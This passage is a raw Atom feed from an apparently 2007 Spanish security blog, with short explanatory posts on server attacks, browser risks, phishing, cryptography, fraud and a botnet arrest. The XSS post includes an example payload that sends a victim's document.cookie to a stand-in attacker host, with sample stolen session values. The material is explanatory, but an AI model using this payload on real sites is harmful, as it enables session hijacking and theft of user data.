[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4060871627456376773?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4060871627456376773/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4060871627456376773&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4060871627456376773'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4060871627456376773'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/un-grupo-de-crackers-intentaban.html' title='Un grupo de &apos;crackers&apos; intentaban controlar un millón de ordenadores'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-6802208491774148110</id><published>2007-12-03T00:14:00.000-03:00</published><updated>2008-12-10T12:33:58.913-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Servidor Web</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nams9blykQY/R1N34ne7RrI/AAAAAAAAAA8/YNUAFuaoJ6Q/s1600-R/exploit.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_nams9blykQY/R1N34ne7RrI/AAAAAAAAAA8/HRWVHJCD--4/s320/exploit.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5139583414314944178" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Exploits remotos&lt;/span&gt;&lt;br /&gt;Programa o técnica que toma ventaja de un hueco de seguridad para comprometer un sistema. Hoy en día una fuente importante de huecos de seguridad es debida a errores de programación (desbordamientos de buffer, formato de cadena).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Puertas traseras&lt;/span&gt;&lt;br /&gt;Mecanismos que permiten el acceso a un sistema, evadiendo los controles de acceso del servidor. En ocasiones, dejados intencionalmente por los programadores, en otros casos dejados inadvertidamente por el administrador.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ingeniería social&lt;/span&gt;&lt;br /&gt;Es la técnica especializada o empírica del uso de acciones estudiadas o habilidosas que permiten manipular a las personas para que voluntariamente realicen actos que normalmente no harían.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;DoS (negación de servicio)&lt;/span&gt;&lt;br /&gt;Va enfocado a interrumpir la disponibilidad de los recursos de un servidor (web, e-mail, chat).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Fuerza bruta&lt;/span&gt;&lt;br /&gt;Técnica que consiste en intentos reiterados de accesar por medio de los controles de acceso legítimos, buscando algún password débil.&lt;br /&gt;&lt;br /&gt;Más adelante se hablara de cada uno de ellos.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-6802208491774148110?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/6802208491774148110/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=6802208491774148110&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6802208491774148110'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6802208491774148110'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-servidor-web.html' title='Ataques - Servidor Web'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nams9blykQY/R1N34ne7RrI/AAAAAAAAAA8/HRWVHJCD--4/s72-c/exploit.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-934101349538817159</id><published>2007-12-03T00:06:00.000-03:00</published><updated>2008-12-10T12:33:59.288-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Navegador 3</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nams9blykQY/R1N0LHe7RqI/AAAAAAAAAA0/i-AnbpV5qDQ/s1600-R/pishing.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_nams9blykQY/R1N0LHe7RqI/AAAAAAAAAA0/FQHBZ4dJrSE/s320/pishing.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5139579334096012962" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;* Phishing&lt;/span&gt;&lt;br /&gt;Suplantación de identidad que busca apropiarse de datos confidenciales de usuarios de la red, por medio de una página que imita a la original.&lt;br /&gt;Se utiliza el correo electrónico como medio de difusión. El mensaje incluye una liga en la que el usuario debe hacer click para conectarse en apariencia al sitio web auténtico.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;El atacante obtiene información del tipo:&lt;/span&gt;&lt;br /&gt; “5177 2939 2949 9349” “exp. 08/05”&lt;br /&gt; “jperez” “sekreto123”&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Solución:&lt;/span&gt;&lt;br /&gt;- No dar click a ligas de páginas de servicios que lleguen por correo electrónico.&lt;br /&gt;- Aplicar parches de seguridad a los navegadores.&lt;br /&gt;- Desconfiar de solicitudes de entregar información y verificar las URLs (particularmente de bancos)&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-934101349538817159?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/934101349538817159/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=934101349538817159&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/934101349538817159'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/934101349538817159'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-navegador-3.html' title='Ataques - Navegador 3'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nams9blykQY/R1N0LHe7RqI/AAAAAAAAAA0/FQHBZ4dJrSE/s72-c/pishing.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2345288493284210799</id><published>2007-12-02T23:48:00.000-03:00</published><updated>2008-12-10T12:33:59.573-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Navegador 2</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nams9blykQY/R1Nyh3e7RpI/AAAAAAAAAAs/jU4kcO3mNFs/s1600-R/xss.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_nams9blykQY/R1Nyh3e7RpI/AAAAAAAAAAs/zzhyv9X7_-M/s320/xss.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5139577525914781330" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt; * XSS – Cross site scripting&lt;/span&gt;&lt;br /&gt;Esta técnica permite redireccionar información del usuario hacia el sitio de un atacante. Esto se   logra por medio de la inserción de funciones de javascript que permiten incluir páginas externas   dentro de una página dinámica.&lt;br /&gt;En concreto es de uso común la función: "document.location.href"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;EJ.:&lt;/span&gt;&lt;br /&gt;http://www.banco.com/paginadinamica.php?variable="&gt;{script} document.location.href=&lt;br /&gt;'http://www.atacante.com/cgi-bin/captura.cgi?'%20+document.cookie {/script}&lt;br /&gt;&lt;br /&gt;En el ejemplo se reemplazó el &lt; por un una { al igual que el de cierre para poder visualiar el ejemplo.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;El atacante obtiene información del tipo:&lt;/span&gt;&lt;br /&gt; usrid=13455; bookmark=paginadinamica.php&lt;br /&gt; ticket=ED4123G4ga3few38dO;&lt;br /&gt; domain=www.banco.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;Solución:&lt;/span&gt;&lt;br /&gt;Inhabilitar Javascript.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2345288493284210799?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2345288493284210799/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2345288493284210799&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2345288493284210799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2345288493284210799'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-navegador-2.html' title='Ataques - Navegador 2'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nams9blykQY/R1Nyh3e7RpI/AAAAAAAAAAs/zzhyv9X7_-M/s72-c/xss.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-9167638704796993176</id><published>2007-12-02T23:37:00.000-03:00</published><updated>2008-12-10T12:34:00.297-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Navegador</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nams9blykQY/R1Nt-Xe7RmI/AAAAAAAAAAU/gERcLyxJ6Ow/s1600-R/java.jpeg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_nams9blykQY/R1Nt-Xe7RmI/AAAAAAAAAAU/IxBYLH0_N8I/s320/java.jpeg" border="0" alt=""id="BLOGGER_PHOTO_ID_5139572517982914146" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;* Java.&lt;/span&gt;&lt;br /&gt;En la actualidad es más o menos seguro.Vulnerable a ataques enfocados al usuario&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;* Javascript.&lt;/span&gt;&lt;br /&gt;Inseguro, se puede enviar información desde formularios html, problemas enfocados a la privacidad.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nams9blykQY/R1NuEXe7RnI/AAAAAAAAAAc/V6u7pN4l1lk/s1600-R/activex.jpeg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_nams9blykQY/R1NuEXe7RnI/AAAAAAAAAAc/_aiSLnhZfhA/s320/activex.jpeg" border="0" alt=""id="BLOGGER_PHOTO_ID_5139572621062129266" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;* ActiveX.&lt;/span&gt;&lt;br /&gt;También vulnerable a ataques enfocados al usuario (applets sin certificado).&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-9167638704796993176?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/9167638704796993176/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=9167638704796993176&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9167638704796993176'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9167638704796993176'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-navegador.html' title='Ataques - Navegador'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nams9blykQY/R1Nt-Xe7RmI/AAAAAAAAAAU/IxBYLH0_N8I/s72-c/java.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-1888053804095088246</id><published>2007-12-02T00:35:00.000-03:00</published><updated>2007-12-02T00:40:50.453-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>Las finalidades de la Criptografía</title><content type='html'>Las finalidades de la &lt;span style="font-weight: bold;"&gt;Criptografía&lt;/span&gt; es, en primer lugar, garantizar el secreto en la comunicación entre dos entidades (personas, organizaciones, etc.) y, en segundo lugar, asegurar que la información que se envía es auténtica en un doble sentido: esto significa que el remitente sea realmente quien dice ser y que el contenido del mensaje enviado, habitualmente denominado Criptograma, no haya sido modificado en su tránsito.&lt;br /&gt;&lt;br /&gt;Otro método utilizado para ocultar el contenido de un mensaje es ocultar el propio mensaje en un canal de información, pero en puridad, esta técnica no se considera Criptografía, sino &lt;span style="font-style: italic;"&gt;Esteganografía&lt;/span&gt; (más adelante hablaremos de él). Por ejemplo, mediante la Esteganografía se puede ocultar un mensaje en un canal de sonido, una imagen o incluso en reparto de los espacios en blanco usados para justificar un texto. La Esteganografía no tiene porqué ser un método alternativo a la Criptografía, siendo común que ambos métodos se utilicen de forma simultánea para dificultar aún más la labor del Criptoanalista.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Ahora bien, más adelante trataremos mas conceptos relacionados con la Criptografía, Esteganografía y las diferentes técnicas y métodos que encontramos hoy en día para ser uso de estas ciencias.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-1888053804095088246?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/1888053804095088246/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=1888053804095088246&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1888053804095088246'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1888053804095088246'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/las-finalidades-de-la-criptografa.html' title='Las finalidades de la Criptografía'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2978554264035155634</id><published>2007-12-02T00:28:00.000-03:00</published><updated>2007-12-02T00:32:21.632-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>¿Qué es la Criptografía?</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://apeiron.laotracara.com/wp-content/imagenes/password1.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://apeiron.laotracara.com/wp-content/imagenes/password1.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;a href="http://es.wikipedia.org/wiki/Criptograf%C3%ADa"&gt;&lt;span style="font-weight: bold;"&gt;Wikipedia&lt;/span&gt;&lt;/a&gt;: La &lt;span style="font-weight: bold;"&gt;Criptografía&lt;/span&gt; (del griego &lt;span style="font-style: italic;"&gt;kryptos&lt;/span&gt;, «ocultar», y &lt;span style="font-style: italic;"&gt;graphos&lt;/span&gt;, «escribir», literalmente «escritura oculta») es el arte o ciencia de cifrar y descifrar información utilizando técnicas que hagan posible el intercambio de mensajes de manera que sólo puedan ser leídos por las personas a quienes van dirigidos.&lt;br /&gt;&lt;br /&gt;Con más precisión, cuando se habla de esta área de conocimiento como ciencia se debería hablar de criptología, que engloba tanto las técnicas de cifrado, la criptografía propiamente dicha, como sus técnicas complementarias: el criptoanálisis, que estudia los métodos que se utilizan para romper textos cifrados con objeto de recuperar la información original en ausencia de la clave.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2978554264035155634?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2978554264035155634/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2978554264035155634&amp;isPopup=true' title='28 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2978554264035155634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2978554264035155634'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/qu-es-la-criptografa.html' title='¿Qué es la Criptografía?'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>28</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7790648941859916103</id><published>2007-12-01T11:55:00.000-03:00</published><updated>2007-12-01T12:00:43.522-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Dificultades para detectar los Fraudes</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.techtear.com/wp-content/uploads/2007/07/calavera.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 108px; height: 108px;" src="http://www.techtear.com/wp-content/uploads/2007/07/calavera.jpg" alt="" border="0" /&gt;&lt;/a&gt;Los Fraudes Informáticos son difíciles de detectar cuando:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Son varias las personas involucradas.&lt;/li&gt;&lt;li&gt;Se planifica a alto nivel.&lt;/li&gt;&lt;li&gt;Los controles relacionados son débiles.&lt;/li&gt;&lt;li&gt;Existe la posibilidad de venta de datos o software a terceros.&lt;/li&gt;&lt;li&gt;No se someten a auditorías especializadas.&lt;/li&gt;&lt;/ul&gt;&lt;blockquote&gt;Como estamos viendo en estos post, la importancia de los fraudes, desde siempre el hombre fue engañado por estos y día a día se ve más habitual.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7790648941859916103?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7790648941859916103/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7790648941859916103&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7790648941859916103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7790648941859916103'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/dificultades-para-detectar-los-fraudes.html' title='Dificultades para detectar los Fraudes'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7858057473693343177</id><published>2007-12-01T11:46:00.000-03:00</published><updated>2007-12-01T11:54:11.844-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Condiciones que aumentan el riesgo de Fraude</title><content type='html'>Implica los contextos que facilitan la comisión del fraude, o sea condiciones inadecuadas para el desenvolvimiento de las tareas informáticas:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Administración controlada por una o pocas personas sin supervisión gerencial.&lt;/li&gt;&lt;li&gt;Estructura organizacional compleja, sin clara definición de autoridad y responsabilidad.&lt;/li&gt;&lt;li&gt;Alta rotación del personal clave.&lt;/li&gt;&lt;li&gt;Plantel insuficiente durante períodos prolongados.&lt;/li&gt;&lt;li&gt;Cambios de auditores frecuentes.&lt;/li&gt;&lt;li&gt;Actividad de la empresa cambiante (aumenta o decrece rápidamente) que implica aumento de las fallas.&lt;/li&gt;&lt;li&gt;Operaciones sin autorización formal.&lt;/li&gt;&lt;li&gt;Archivos sujetos a ajustes frecuentes, operaciones no contabilizadas o no conciliadas.&lt;/li&gt;&lt;li&gt;Documentación insuficiente o desactualizada de programas y sistemas.&lt;/li&gt;&lt;li&gt;Cambios frecuentes de programas, sin documentar, autorizar y probar.&lt;/li&gt;&lt;li&gt;Existencia de puntos débiles para acceder al sistema.&lt;/li&gt;&lt;li&gt;Falta de destrucción adecuada de la información en desuso (listados, carbónicos, etc.)&lt;/li&gt;&lt;li&gt;Personal de Sistemas que es especialmente sensible a la presión o extorsión.&lt;/li&gt;&lt;li&gt;Sistemas Operativos con bajos niveles de Seguridad.&lt;/li&gt;&lt;li&gt;Métodos criptográficos accesibles o insuficientemente aplicados.&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7858057473693343177?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7858057473693343177/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7858057473693343177&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7858057473693343177'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7858057473693343177'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/condiciones-que-aumentan-el-riesgo-de.html' title='Condiciones que aumentan el riesgo de Fraude'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2767803809349837907</id><published>2007-11-30T11:24:00.000-03:00</published><updated>2007-11-30T11:26:19.560-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Detenido grupo de crackers que controlaban 1 millón de PCs Zombies</title><content type='html'>La policía neozelandesa desarticuló un grupo de &lt;span style="font-weight: bold;"&gt;Crackers&lt;/span&gt; expertos en el uso de botnets para controlar ordenadores de usuarios.&lt;br /&gt;&lt;br /&gt;El jefe del grupo era un conocido cracker que operaba bajo el nick de Akill y que residía en Nueva Zelanda.&lt;br /&gt;&lt;br /&gt;La operación fue realizada conjuntamente con la policía local y el FBI. En total fueron detenidos unas 13 personas incluyendo el responsable máximo de la red.&lt;br /&gt;&lt;br /&gt;La policía informó que el grupo era responsable de daños por valor de 20 millones de dólares y que controlaban un millón de ordenadores esparcidos por todo el mundo. Los propietarios de los equipos desconocían que estos ejecutaban desde ataques a envíos masivos de spam comportándose normalmente en su actividad.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://seguinfo.blogspot.com/2007/11/detenido-grupo-de-crackers-que.html"&gt;&lt;span style="font-weight: bold;"&gt;Segu-Info&lt;/span&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2767803809349837907?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2767803809349837907/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2767803809349837907&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2767803809349837907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2767803809349837907'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/detenido-grupo-de-crackers-que.html' title='Detenido grupo de crackers que controlaban 1 millón de PCs Zombies'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 